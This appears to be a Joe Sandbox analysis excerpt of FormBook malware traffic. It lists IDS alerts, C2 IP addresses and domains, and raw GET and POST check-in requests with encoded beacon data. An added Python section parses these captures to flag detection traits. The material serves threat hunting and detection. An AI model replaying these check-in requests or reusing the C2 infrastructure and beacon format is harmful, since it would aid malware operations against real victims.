Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49754 -> 54.179.173.60:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 103.42.108.46:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 217.160.0.127:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49785 -> 54.183.209.210:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49781 -> 162.240.81.18:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 38.55.112.70:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 185.134.245.113:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49782 -> 162.240.81.18:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49773 -> 103.42.108.46:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 82.221.128.183:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 13.248.169.48:80
            Source: DNS query: www.nevsehir-nakliyat.xyz
Source: Joe Sandbox View, IP Address: 162.240.81.18
Source: Joe Sandbox View, IP Address: 162.0.213.94
Source: Joe Sandbox View, IP Address: 13.248.169.48
Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: ACPCA
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: THORDC-ASIS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic; HTTP traffic detected:
                GET /ujbu/?lt=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88=&3ry=nj20Xr HTTP/1.1
                Host: www.nosr.net
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; HTTP traffic detected:
                GET /4c7j/?3ry=nj20Xr&lt=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM= HTTP/1.1
                Host: www.complexity.pub
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; HTTP traffic detected:
                GET /csz1/?lt=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&3ry=nj20Xr HTTP/1.1
                Host: www.nevsehir-nakliyat.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; HTTP traffic detected:
                GET /wg84/?3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo= HTTP/1.1
                Host: www.masteriocp.online
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; HTTP traffic detected:
                GET /09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr HTTP/1.1
                Host: www.kryto.top
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; HTTP traffic detected:
                GET /efkd/?3ry=nj20Xr&lt=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A= HTTP/1.1
                Host: www.angelenterprise.biz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; HTTP traffic detected:
                GET /pjne/?lt=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&3ry=nj20Xr HTTP/1.1
                Host: www.dyme.tech
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; HTTP traffic detected:
                GET /3cch/?3ry=nj20Xr&lt=DRiLKdz0S/bqEudf8+lJZmKhIEkCV4eCneZlIdHidh1UyVXSe2F494jKrmXjvhSAferATdA1WGLj27vrwJsZD/LqvQNnepl3kdPcsh0FNk4E92FpuHIxGGI= HTTP/1.1
                Host: www.lilibetmed.online
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; HTTP traffic detected:
                GET /pn1r/?lt=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&3ry=nj20Xr HTTP/1.1
                Host: www.mbwd.store
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; HTTP traffic detected:
                GET /dw6h/?lt=R/pE8KC/c36ywADQh5FkOiDH8KVbuy/iFFPQAWrjddfpU+7mPUq4raSb1MURPFl7uYa4SfXFDOIuFXNkiFpjga1JutrdCl+XzV0YaijSh6Fqy01qwtES1vY=&3ry=nj20Xr HTTP/1.1
                Host: www.fvti.cloud
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; HTTP traffic detected:
                GET /3i7y/?lt=7+2uneOBixDDmhLFRXF/ufkAm5AC1SXFsWvwANuZC0TQ0YERrtM9rlugcy5pD3j7o6sEidpw3wSWmiKn6bu88qr2mjlQFSGqmkD6eyB8L9Z0Lf+o3Q/3u6k=&3ry=nj20Xr HTTP/1.1
                Host: www.sorriragora.online
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; HTTP traffic detected:
                GET /6ua2/?3ry=nj20Xr&lt=ROgFOn87xawaO6SZL50JuAl1kKxTrphupTX70ShDOCtjrPizjlCh9yM4paCu7ldqJbY3adTxPonHhY9dmNlpIFS90RvvBYO2gPQCKrVy+PqJYkpukQev2c8= HTTP/1.1
                Host: www.jyourwd.store
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global traffic; DNS traffic detected: DNS query: www.nosr.net
            Source: global traffic; DNS traffic detected: DNS query: www.monos.shop
            Source: global traffic; DNS traffic detected: DNS query: www.complexity.pub
            Source: global traffic; DNS traffic detected: DNS query: www.nevsehir-nakliyat.xyz
            Source: global traffic; DNS traffic detected: DNS query: www.masteriocp.online
            Source: global traffic; DNS traffic detected: DNS query: www.kryto.top
            Source: global traffic; DNS traffic detected: DNS query: www.angelenterprise.biz
            Source: global traffic; DNS traffic detected: DNS query: www.dyme.tech
            Source: global traffic; DNS traffic detected: DNS query: www.lilibetmed.online
            Source: global traffic; DNS traffic detected: DNS query: www.mbwd.store
            Source: global traffic; DNS traffic detected: DNS query: www.terrearcenciel.online
            Source: global traffic; DNS traffic detected: DNS query: www.fvti.cloud
            Source: global traffic; DNS traffic detected: DNS query: www.theaji.shop
            Source: global traffic; DNS traffic detected: DNS query: www.sorriragora.online
            Source: global traffic; DNS traffic detected: DNS query: www.jyourwd.store
            Source: unknown; HTTP traffic detected:
                POST /4c7j/ HTTP/1.1
                Host: www.complexity.pub
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.5
                Content-Length: 199
                Connection: close
                Cache-Control: no-cache
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.complexity.pub
                Referer: http://www.complexity.pub/4c7j/
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                Data Raw: 6c 74 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6e 77 30 41 31 53 68 69 73 6e 76 6f 56 6e 56 67 38 32 55 30 36 34 55 31 46 35 65 5a 46 41 47 75 44 78 78 53 6c 43 6c 54 48 5a 61 6f 35 6c 63 69 48 39 4a 54 49 69 6f 76 64 72 6d 64 77 55 79 31 6c 47 6c 6c 38 30 71 37 32 30 5a 68 70 4d 61 6f 69 50 6b 50 31 4e 48 73 41 39 58 42 4b 62 43 76 71 59 2f 78 78 46 33 49 51 68 4e 37 2b 5a 45 64 73 42 51 2b 38 2b 6c 79 41 7a 35 71 45 44 4a 4f 73 48 72 38 4a 52 66 63 52 70 50 4f 33 33 68 6e 4e 52 49 35 44 4c 41 77 52 66 78 61 6d 63 7a 71 61 4b 51 64 6f 2f 4c 36 73 31 6c 36 58 59 75 57 71 69 53 6b 4d 41 3d 3d
                Data Ascii: lt=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DLAwRfxamczqaKQdo/L6s1l6XYuWqiSkMA==
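Added example, not part of the Joe Sandbox report and not Joe Security's or FormBook's code: a small Python parser that reads the twelve GET check-ins, the POST and the fifteen DNS names listed above and reports the traits a hunter would pivot on. The traits are all visible in the capture: a four-character path that changes per request, one short constant (3ry=nj20Xr) repeated in every GET while the host changes each time, one long opaque base64-looking value, a POST whose form body carries the same kind of blob, and an Android/Opera User-Agent emitted by a process on the Windows analysis host. It also diffs the DNS list against the hosts that actually received an HTTP request. The request texts are rebuilt from the report's lines; the regexes, thresholds, helper names and trait labels are this example's own and are not a published detection signature.

```python
"""
Added example, not part of the Joe Sandbox report: parse the check-in traffic
captured above and report the traits a hunter would pivot on. The twelve GETs,
the POST and the fifteen DNS names are copied from the report; helper names,
regexes and trait labels are this example's own, not a published signature.
"""
import re
from urllib.parse import urlsplit

# User-Agent sent with every request in the report: an Android/Opera string
# coming from a process on the Windows analysis host.
UA = ("Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530")


def _get(host, path, query):
    """Rebuild one captured GET as raw HTTP/1.1 text (constructed from the report)."""
    return f"GET {path}?{query} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\nUser-Agent: {UA}\r\n\r\n"


SAMPLE_REQUESTS = [  # query parameter order varies between requests, exactly as captured
    _get("www.nosr.net", "/ujbu/", "lt=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88=&3ry=nj20Xr"),
    _get("www.complexity.pub", "/4c7j/", "3ry=nj20Xr&lt=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM="),
    _get("www.nevsehir-nakliyat.xyz", "/csz1/", "lt=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&3ry=nj20Xr"),
    _get("www.masteriocp.online", "/wg84/", "3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo="),
    _get("www.kryto.top", "/09dt/", "lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr"),
    _get("www.angelenterprise.biz", "/efkd/", "3ry=nj20Xr&lt=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A="),
    _get("www.dyme.tech", "/pjne/", "lt=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&3ry=nj20Xr"),
    _get("www.lilibetmed.online", "/3cch/", "3ry=nj20Xr&lt=DRiLKdz0S/bqEudf8+lJZmKhIEkCV4eCneZlIdHidh1UyVXSe2F494jKrmXjvhSAferATdA1WGLj27vrwJsZD/LqvQNnepl3kdPcsh0FNk4E92FpuHIxGGI="),
    _get("www.mbwd.store", "/pn1r/", "lt=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&3ry=nj20Xr"),
    _get("www.fvti.cloud", "/dw6h/", "lt=R/pE8KC/c36ywADQh5FkOiDH8KVbuy/iFFPQAWrjddfpU+7mPUq4raSb1MURPFl7uYa4SfXFDOIuFXNkiFpjga1JutrdCl+XzV0YaijSh6Fqy01qwtES1vY=&3ry=nj20Xr"),
    _get("www.sorriragora.online", "/3i7y/", "lt=7+2uneOBixDDmhLFRXF/ufkAm5AC1SXFsWvwANuZC0TQ0YERrtM9rlugcy5pD3j7o6sEidpw3wSWmiKn6bu88qr2mjlQFSGqmkD6eyB8L9Z0Lf+o3Q/3u6k=&3ry=nj20Xr"),
    _get("www.jyourwd.store", "/6ua2/", "3ry=nj20Xr&lt=ROgFOn87xawaO6SZL50JuAl1kKxTrphupTX70ShDOCtjrPizjlCh9yM4paCu7ldqJbY3adTxPonHhY9dmNlpIFS90RvvBYO2gPQCKrVy+PqJYkpukQev2c8="),
    # The POST check-in; the body is the report's "Data Ascii" for that request.
    "POST /4c7j/ HTTP/1.1\r\nHost: www.complexity.pub\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: 199\r\nConnection: close\r\nUser-Agent: {UA}\r\n\r\n"
    "lt=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DLAwRfxamczqaKQdo/L6s1l6XYuWqiSkMA==",
]

DNS_QUERIES = [  # every name the sample queried, from the report's DNS list
    "www.nosr.net", "www.monos.shop", "www.complexity.pub", "www.nevsehir-nakliyat.xyz",
    "www.masteriocp.online", "www.kryto.top", "www.angelenterprise.biz", "www.dyme.tech",
    "www.lilibetmed.online", "www.mbwd.store", "www.terrearcenciel.online", "www.fvti.cloud",
    "www.theaji.shop", "www.sorriragora.online", "www.jyourwd.store",
]

SHORT_PATH = re.compile(r"/[a-z0-9]{4}/")               # /ujbu/, /4c7j/, ...
SHORT_CONST = re.compile(r"[A-Za-z0-9]{4,8}")           # nj20Xr, identical in every GET
OPAQUE_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")   # the long lt= value


def _params(qs):
    """Split k=v&k=v without percent-decoding, so '+' and '/' inside the blob survive."""
    return dict(pair.partition("=")[::2] for pair in qs.split("&") if pair)


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: request line, headers, form body if present."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    is_form = headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
    return {"method": method, "path": url.path, "query": _params(url.query),
            "headers": headers, "body": _params(body) if is_form and body else {}}


def formbook_traits(req):
    """Labels of the check-in traits this request shows, in a fixed order."""
    params = req["query"] if req["method"] == "GET" else req["body"]
    values = list(params.values())
    traits = []
    if SHORT_PATH.fullmatch(req["path"]):
        traits.append("four-char-path")
    if any(OPAQUE_BLOB.fullmatch(v) for v in values):
        traits.append("opaque-blob-param")
    if req["method"] == "GET" and len(params) == 2 and any(SHORT_CONST.fullmatch(v) for v in values):
        traits.append("short-constant-param")
    if req["method"] == "POST" and req["body"]:
        traits.append("form-post-checkin")
    if "Android" in req["headers"].get("user-agent", ""):
        traits.append("mobile-ua-on-windows")
    return traits


def cluster_by_constant(reqs):
    """Group hosts by the short constant their GET query carries: one value, many domains."""
    clusters = {}
    for r in reqs:
        for v in r["query"].values():
            if SHORT_CONST.fullmatch(v):
                clusters.setdefault(v, set()).add(r["headers"]["host"])
    return clusters


def resolved_but_not_contacted(dns_queries, reqs):
    """Names the sample queried although no HTTP request to them appears in the capture."""
    return sorted(set(dns_queries) - {r["headers"]["host"] for r in reqs})
```

Call `formbook_traits(parse_request(raw))` per request, `cluster_by_constant` over all of them, and `resolved_but_not_contacted(DNS_QUERIES, reqs)` for the diff. On the report's own data the constant nj20Xr clusters all twelve GET hosts, and three queried names (www.monos.shop, www.terrearcenciel.online, www.theaji.shop) never appear as an HTTP Host; whether they failed to resolve or were simply not contacted within the analysis window is not something the report states.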
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 02:51:29 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 
32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 09 Sep 2024 02:51:57 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
